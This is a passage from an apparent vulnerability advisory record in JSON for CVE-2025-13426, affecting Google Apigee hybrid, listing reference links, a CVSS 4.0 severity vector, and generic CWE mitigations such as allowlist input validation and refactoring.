"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13426"
},
{
"type": "WEB",
"url": "https://docs.cloud.google.com/apigee/docs/hybrid/release-notes#March_01_2025"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear",
"type": "CVSS_V4"
}
]
}
Mitigation
Strategy: Input Validation
For any externally-influenced input, check the input against an allowlist of acceptable values.
Mitigation
Strategy: Refactoring
Refactor the code so that it does not need to be dynamically managed.
No CAPEC attack patterns related to this CWE.